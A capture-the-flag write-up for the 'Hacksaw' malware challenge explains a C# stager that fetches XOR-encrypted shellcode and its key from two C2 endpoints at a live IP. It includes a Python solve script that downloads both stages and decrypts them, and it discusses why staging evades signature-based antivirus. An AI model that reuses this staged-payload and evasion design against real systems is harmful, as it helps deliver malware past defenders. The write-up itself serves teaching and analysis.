Hacksaw
3 Solves
We have installed the newest anti-virus on our systems; however, this piece of malware managed to evade our detections. Maybe we should invest more in dynamic analysis.
Background Knowledge
Similar to Command & Post, this challenge relies heavily on prior knowledge of encryption and of techniques used by malware developers.
The challenge utilizes two endpoints on the C2 server:
The first endpoint is used to retrieve the encrypted shellcode to be executed by the victim.
The second endpoint serves the key used to decrypt that shellcode.
Staging the payload and its key separately is used to evade signature-based AV: nothing malicious is stored in the agent itself, and even if artifacts of the encrypted shellcode are found on the system, the defender cannot recover the payload from that artifact alone without also obtaining the key. It does not protect against dynamic analysis, since both stages must be fetched over the network and decrypted in memory before execution, which is exactly what the challenge description hints at.
Solution
The player is given an agent.cs file, the C# source of the agent.
Wow, this malware developer is not very good at hiding the C2 server: the URL is assembled from the pieces of a string array (string[a]), so you can recover it by eye simply by concatenating the elements in order.
Endpoint 1: http://157.230.251.0:6001/shellcode
Endpoint 2: http://157.230.251.0:6001/key
It seems like the shellcode fetched from the first endpoint is being XOR'ed against the key fetched from the second endpoint via the function called "Haxor".
For the more experienced malware developers, please don't mind my wrongful usage of cmd.exe to execute shellcode; I was very sleepy when making this challenge. The shellcode should be executed via other techniques (e.g. CreateRemoteThread, etc.).
The challenge solution is simply to fetch both endpoints and XOR the encrypted shellcode against the key to recover the raw shellcode, which in this case is actually a plain string rather than injectable assembly.
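The solve script below is an added example for this writeup, not the challenge's own agent.cs code. It mirrors the agent's two-stage fetch and the "Haxor" step in Python. It assumes Haxor is a plain byte-wise XOR that repeats the key when the key is shorter than the payload (the writeup only states that the shellcode is XOR'ed against the key, so the repeating behaviour is an assumption). The two URLs are the ones recovered from the string array above; the sample bytes used for the offline run are constructed here and are not the real challenge artifacts.

```python
"""Solve helper for the Hacksaw stager: fetch both C2 stages, then XOR them.

Added example for the writeup; not the original agent.cs code.
"""
import sys
import urllib.request

# Endpoints recovered from the string[a] array in agent.cs.
SHELLCODE_URL = "http://157.230.251.0:6001/shellcode"
KEY_URL = "http://157.230.251.0:6001/key"


def haxor(data: bytes, key: bytes) -> bytes:
    """Byte-wise XOR of data against key (Python stand-in for the agent's Haxor).

    Assumption: the key is repeated cyclically if it is shorter than the
    payload. XOR is its own inverse, so this one function both encrypts and
    decrypts: haxor(haxor(x, k), k) == x.
    """
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def fetch(url: str, timeout: float = 10.0) -> bytes:
    """Download one stage from the C2. Only works while the server is up."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def decrypt_stage(encrypted: bytes, key: bytes) -> str:
    """Recover the 'shellcode', which for this challenge is a plain string."""
    return haxor(encrypted, key).decode("utf-8", errors="replace")


def solve(shellcode_url: str = SHELLCODE_URL, key_url: str = KEY_URL) -> str:
    """Live solve: pull both stages from the C2 and decrypt, like the agent does."""
    return decrypt_stage(fetch(shellcode_url), fetch(key_url))


# Constructed sample data standing in for the two HTTP responses so the
# script can be exercised offline. NOT the real challenge payload or key.
SAMPLE_KEY = b"hacksaw"
SAMPLE_PLAINTEXT = b"echo this stage is a string, not asm"
SAMPLE_ENCRYPTED = haxor(SAMPLE_PLAINTEXT, SAMPLE_KEY)


if __name__ == "__main__":
    # Offline round trip on the constructed sample.
    print("sample ciphertext:", SAMPLE_ENCRYPTED.hex())
    print("sample decrypted :", decrypt_stage(SAMPLE_ENCRYPTED, SAMPLE_KEY))
    # Pass --live to talk to the real C2 (only meaningful while it is online).
    if "--live" in sys.argv[1:]:
        print("live decrypted   :", solve())
```

Run it without arguments for the offline round trip on the constructed sample, or with `--live` to hit the two endpoints while the C2 is still up. Because both stages travel over plain HTTP, capturing the agent's traffic during dynamic analysis yields exactly the same two inputs.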